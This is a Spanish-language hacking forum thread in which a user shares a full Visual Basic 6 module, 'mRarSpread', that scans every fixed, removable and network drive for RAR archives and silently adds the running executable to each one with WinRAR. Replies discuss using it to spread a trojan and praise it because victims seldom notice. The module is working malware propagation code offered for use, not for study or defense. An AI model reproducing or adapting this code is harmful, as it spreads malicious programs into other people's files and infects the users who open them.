Mostrar mensajes previos
Ordenar por
por DarKing Paranóico
Por si alguien no tiene este modulo.

Espero les sea util.

Código: Seleccionar todo

'---------------------------------------------------------------------------------------
' Module      : mRarSpread
' DateTime    : 2010/01/13
' Coder       : ParadoX
' Purpose     : Injects own file into every rar-file on system
' Usage       : At your own risk
'               Call SearchAndInfectRars    [Starts the proccess]
' Requirements: None
'---------------------------------------------------------------------------------------

Option Explicit

Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Private Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private Declare Function GetShortPathName Lib "kernel32.dll" Alias "GetShortPathNameA" (ByVal lpszLongPath As String, ByVal lpszShortPath As String, ByVal cchBuffer As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long

Private Const MAX_PATH = 260
Private Const INVALID_HANDLE_VALUE = -1
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_SYSTEM = &H4
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100

Private Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
End Type

Private Type WIN32_FIND_DATA
    dwFileAttributes As Long
    ftCreationTime As FILETIME
    ftLastAccessTime As FILETIME
    ftLastWriteTime As FILETIME
    nFileSizeHigh As Long
    nFileSizeLow As Long
    dwReserved0 As Long
    dwReserved1 As Long
    cFileName As String * MAX_PATH
    cAlternate As String * 14
End Type

Public Function SearchAndInfectRars() As Boolean
    On Error Resume Next
    
    If Dir(Environ("ProgramFiles") & "\WinRAR\WinRAR.exe") <> "" Then
        Dim sBuffer As String * 255
        Dim sDrives As String
        Dim lResult As Long
        Dim sDrive As String
        Dim sPos As Integer
        Dim lType As Long
    
        Call CopyFile(App.Path & "\" & App.EXEName & ".exe", Environ("HOMEDRIVE") & App.EXEName & ".exe", False)
    
        lResult = GetLogicalDriveStrings(Len(sBuffer), sBuffer)
        sDrives = Left$(sBuffer, lResult)
 
        While Len(sDrives) > 0
            sPos = InStr(sDrives, Chr$(0))
            sDrive = Left$(sDrives, sPos - 1)
            sDrives = Mid$(sDrives, sPos + 1)
        
            lType = GetDriveType(sDrive)
            
                If lType = 2 Or lType = 3 Or lType = 4 Then
                    Call FindFiles(Left$(sDrive, 2), "*.rar")
                End If
        Wend
    End If
End Function

Private Function RARSpread(ByVal WinrarPath As String, ByVal RarArchive As String, ByVal Malware As String) As Boolean
    On Error GoTo err:
    If (Dir(WinrarPath) <> "") And (Dir(RarArchive) <> "") And (Dir(Malware) <> "") Then
        Dim lRet As Long
        lRet = ShellExecute(GetModuleHandle(App.Path), "open", WinrarPath, " a -y " & RarArchive & " " & Malware, "C:\", 0)
            If lRet = 42 Then
                RARSpread = True
            Else
                RARSpread = False
            End If
    Else
        RARSpread = False
    End If
    Exit Function
err:
    RARSpread = False
End Function

Private Sub FindFiles(ByVal vsFolderPath As String, ByVal vsSearch As String)
    Dim WFD As WIN32_FIND_DATA
    Dim hSearch As Long
    Dim strDirName As String

    DoEvents

        If Right$(vsFolderPath, 1) <> "\" Then
            vsFolderPath = vsFolderPath & "\"
        End If

    hSearch = FindFirstFile(vsFolderPath & "*.*", WFD)

        If hSearch <> INVALID_HANDLE_VALUE Then GetFilesInFolder vsFolderPath, vsSearch

            Do
                If (WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) Then strDirName = TrimNulls(WFD.cFileName)
                If (strDirName <> ".") And (strDirName <> "..") Then
                    FindFiles vsFolderPath & strDirName, vsSearch
                End If
    
        Loop While FindNextFile(hSearch, WFD)
            FindClose hSearch
            Kill "C:\" & App.EXEName & ".exe"
End Sub

Private Sub GetFilesInFolder(ByVal vsFolderPath As String, ByVal vsSearch As String)
    On Error Resume Next
    Dim WFD As WIN32_FIND_DATA
    Dim hSearch As Long
    Dim strFileName As String
    Dim lVal As Long
    Dim short_path As String
    
    If Right$(vsFolderPath, 1) <> "\" Then
        vsFolderPath = vsFolderPath & "\"
    End If

    hSearch = FindFirstFile(vsFolderPath & vsSearch, WFD)
  
        If hSearch <> INVALID_HANDLE_VALUE Then
            Do
                If (WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY Then
                    strFileName = TrimNulls(WFD.cFileName)
                    short_path = Space$(256)
                    lVal = GetShortPathName(vsFolderPath & strFileName, short_path, Len(short_path))
                    Call RARSpread(Environ("ProgramFiles") & "\WinRAR\WinRAR.exe", Left$(short_path, lVal), Environ("HOMEDRIVE") & App.EXEName & ".exe")
                End If
                
    Loop While FindNextFile(hSearch, WFD)
        FindClose hSearch
    End If
End Sub

Private Function TrimNulls(ByVal vsStringIn As String) As String
        If InStr(vsStringIn, Chr(0)) > 0 Then
            vsStringIn = Left$(vsStringIn, InStr(vsStringIn, Chr(0)) - 1)
        End If
    TrimNulls = vsStringIn
End Function
slds

PD. q un moderador si quiere lo copie en un txt y lo adjunte no pude
por ØnLy Se conecta desde un manicomio
Una pegunta:

Infecta los RAR desde dentro, osea, infecta los archivos que etsaban dentro de los RAR?? crea un nuevo archivo que ira infectado??
o Infecta el RAR como tal??

Gracia spor el modulo !

Testing in progress!

Saludos!
obey escribió:Pues si tuviese mas edad todavia pero esqe perder la virginidad con tu profesora de informatica y que ademas tenga 50....
por davidad Esquizofrénico
me imagino que est hara que todo los rar de tu pc queden infectado con tu virus/troyano.
Pienso que esto para un troyano no viene bien porque seria muy cantoso, ya que cuando tu veas miles de infecciones formatearas muy rapidamente.

Pero muchisimas gracias por el code!!!!
Me vendra muy bien
En 1º en 2º o en 3º BETICO hasta que muera
por irux Delirios esporádicos
exactamente lo que hace es abrir el .rar y añadirle un archivo mas ese archivo seria tu propio executable que seria el troyan

saludos

PD: Exelente code muy extructurado
Imagen
por D3F4C3-M4N
davidad escribió:me imagino que est hara que todo los rar de tu pc queden infectado con tu virus/troyano.
Pienso que esto para un troyano no viene bien porque seria muy cantoso, ya que cuando tu veas miles de infecciones formatearas muy rapidamente.

Pero muchisimas gracias por el code!!!!
Me vendra muy bien


-.-' no lo creo ademas el exe se adjunta muchos son usuarios normales y jamas se dan cuenta de eso es una muy buena funcion gracias darking(otro Nica )
Temas similares
Saltar Nod32 Modulo Amsi por aficionadohxc en Dudas y Preguntas
Links sobre el tema
Variantes de tema
Responder

Volver a “Otros lenguajes”